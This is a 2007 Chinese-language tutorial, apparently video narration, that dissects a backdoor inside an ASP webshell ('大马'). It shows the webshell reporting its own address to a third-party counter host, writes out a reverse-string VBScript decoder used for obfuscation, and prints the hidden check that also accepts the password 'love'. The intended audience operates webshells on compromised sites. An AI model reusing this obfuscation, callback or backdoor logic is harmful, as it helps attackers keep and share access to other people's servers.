今天 给大家做的上抓超强webshell使用中大马的后门，

为了动画的真实性， 先下载，

现在的人不知是怎么想的， 哎， 

等等吧，

整理时间： 2007-5-22 16:09:13

没时间给大家做， 今天抽的一点时间给大家做的， 

好了，  下完了，

垃圾号， 研究技术。群号是：38693995

密码就123456吧， 加了密的， 打开，网络嗅探器

http://count24.51yes.com//127.0.0.1%3A81/muma.asp&color=16x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%201.1.4322%29

看到没有啊，  //127.0.0.1%3A81/muma.asP 我们的马的地址，

我们来破解它， 

function UnEncode(cc)
for i = 1 to len(cc)
    if mid(cc,i,1)<> "琳" then
temp = Mid(cc, i, 1) + temp
   else
    temp=vbcrlf&temp
 end if
next
UnEncode=temp
end function

这里有一个东东没有被加密

这个就来用来解密的吧， 

http://www.baidu.com/

moc.udiab.www//:ptth""=LRUetiS琳字名门后'

这两面三刀个对比起来你会想到什么，  是不是刚好是倒过来的啊，  哈哈， 

这下子找它的后门就简单了， 

count24 倒过来就是42tnuoc   找一下试试， 

21=ogol&629761642=di?xpsa.kcilc/moc.sey15.42tnuoc//:ptth

倒过来就是http://count24.51yes.com/click.aspx?id=246167926&logo=21 这是一个流量， 我刚才看了的，

可是他怎么利用我们的马的地址的呢，  我开始以为是他查入了一句话， 可后来我找了很久没有找出来 可看到它， execute(UnEncode(hu))

这不是一句话哦，  这个就是解密的，  我们先把他解密了不就什么都知道了吧，

我们来试试看，

看， 是不是很熟悉啊，  只能一段一段解啊， 我这由于系统原因， 

好，  解密完了， 我们来看看啊， 

怎么那一个解出来找不到啊，  可能是复制多了系统没有算过来，  这一个是我刚才解密好了的，

他的密码为：love

也就是说这个大马有两个密码，一个是我们自己的， 另一个是他的后门密码love,

if request.form(""pass"")=UserPass or request.form(""pass"")=""love"" then

我们来试试啊， 看能不能进去啊，
看到没， 进去了，  我们再用自己的密码：123456 去试试，

应该能进去的， 慢啊，看到没，进去了， 好了， 教程就是这样，   其它的话我就不多说了，

我有时间了会做一个去后门版的给大家，